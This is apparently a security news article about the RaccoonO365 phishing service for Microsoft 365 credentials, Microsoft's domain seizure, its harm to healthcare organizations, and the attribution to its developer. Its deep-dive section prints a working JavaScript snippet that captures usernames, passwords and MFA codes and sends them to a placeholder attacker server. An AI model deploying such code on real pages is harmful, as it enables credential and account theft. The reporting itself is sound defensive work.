Since mid-2024, cybercriminals have leveraged a subscription-based phishing platform known as RaccoonO365 to harvest Microsoft 365 credentials at scale.
Emerging as an off-the-shelf service, RaccoonO365 requires minimal technical skill, allowing threat actors to deploy convincing phishing campaigns by impersonating official Microsoft communications.
These kits replicate Microsoft branding, email templates, and login portals to trick recipients into divulging usernames, passwords, and multi-factor authentication (MFA) codes.
As of September 2025, this operation has affected over 5,000 accounts across 94 countries, demonstrating the pervasive risk posed by commoditized social engineering tools.
In a coordinated legal action, Microsoft’s Digital Crimes Unit (DCU) secured a court order from the Southern District of New York to seize 338 domains facilitating the distribution of RaccoonO365, effectively dismantling the platform’s core infrastructure.
Microsoft analysts noted the rapid evolution of this service, which now boasts features that subvert MFA protections and automate credential harvesting at rates up to 9,000 targets per day.
The seized domains served as both phishing hosts and command-and-control interfaces for subscription management, crippling the ability of subscribers to launch fresh attacks.
Although not all stolen credentials resulted in direct network intrusions, the impact on high-value sectors, particularly healthcare, was severe.
At least 20 U.S. healthcare organizations reported delayed patient care, compromised lab results, and data breaches following successful RaccoonO365 phishing attempts.
Microsoft’s partnership with Health-ISAC underlined the public safety implications, as stolen credentials often served as initial access points for subsequent malware or ransomware deployments.
The DCU’s swift intervention illustrates the necessity of legal and technical countermeasures against low-barrier tools that empower malicious actors.
Microsoft analysts identified Joshua Ogundipe, a Nigeria-based developer, as the principal architect of RaccoonO365.
Through an operational security lapse revealing a cryptocurrency wallet, investigators traced over US$100,000 in subscription payments.
Ogundipe’s Telegram channel, with more than 850 members, advertised both standard phishing kits and a newly introduced “AI-MailCheck” service designed to refine spear-phishing efficacy.
This attribution underscores how streamlined criminal enterprises can scale with minimal overhead, challenging defenders to anticipate modular threat services.
Infection Mechanism Deep Dive
RaccoonO365’s infection mechanism revolves around dynamic form injection and transparent redirection tactics.
When a victim clicks a malicious link, the browser is redirected to a decoy login page that mirrors Microsoft’s official portal.
A small JavaScript snippet, injected at runtime, captures input fields and forwards credentials to the attacker’s server:

document.querySelector('form').addEventListener('submit', function(e) {
    e.preventDefault();
    let creds = {
        user: document.getElementById('username').value,
        pass: document.getElementById('password').value,
        otp: document.getElementById('mfa').value
    };
    fetch('https://attacker-server.com/collect', {
        method: 'POST',
        body: JSON.stringify(creds),
        headers: {'Content-Type': 'application/json'}
    }).then(() => window.location.href = "https://login.microsoftonline.com");
});
This code ensures seamless data exfiltration while redirecting users to the legitimate login page, minimizing suspicion.
Advanced operators employ session-token reuse and header manipulation to bypass MFA prompts.
Combined with automated email distribution and AI-driven content variation, this infection chain exemplifies modern phishing sophistication and underscores the critical importance of layered defenses and user awareness.